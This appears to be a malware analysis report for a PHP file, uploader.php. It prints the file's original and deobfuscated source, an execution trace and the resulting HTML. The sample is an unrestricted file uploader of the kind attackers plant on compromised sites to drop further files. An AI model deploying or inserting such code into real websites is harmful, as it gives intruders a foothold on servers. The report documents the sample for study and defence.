uploader.php

md5: bc9c9099103830d5c3a0f08e603ea652

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Files
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
Eagle1337
<?php 
$f = $_FILES;
if (isset($_POST['upl'])) {
    if (isset($f['file'])) {
        if (move_uploaded_file($f['file']['tmp_name'], $f['file']['name'])) {
            echo "<br>" . $f['file']['name'] . " Uploaded!<br>";
        }
    }
} else {
    ?>
   <form action='' method='POST' enctype='multipart/form-data'>
   <input type='file' name='file'>
   <input type='submit' name='upl' value='upload'>
   </form>
  <?php 
}
Execution traces
data/traces/bc9c9099103830d5c3a0f08e603ea652_trace-1676249328.1733.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:49:14.071130]
1	0	1	0.000167	393528
1	3	0	0.000226	395696	{main}	1		/var/www/html/uploads/uploader.php	0	0
1		A						/var/www/html/uploads/uploader.php	3	$f = []
1	3	1	0.000259	395696
			0.000284	314272
TRACE END   [2023-02-12 22:49:14.071273]

Generated HTML code
<html><head></head><body>Eagle1337
   <form action="" method="POST" enctype="multipart/form-data">
   <input type="file" name="file">
   <input type="submit" name="upl" value="upload">
   </form>
  </body></html>
Original PHP code
Eagle1337
<?php
$f=$_FILES;
if(isset($_POST['upl'])){
	if(isset($f['file'])){
		if(move_uploaded_file($f['file']['tmp_name'],$f['file']['name'])){
			echo "<br>".$f['file']['name']." Uploaded!<br>";
		}
	}
}else{
  ?>
   <form action='' method='POST' enctype='multipart/form-data'>
   <input type='file' name='file'>
   <input type='submit' name='upl' value='upload'>
   </form>
  <?php
}?>

PHP Malware Analysis

uploader.php

md5: bc9c9099103830d5c3a0f08e603ea652

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code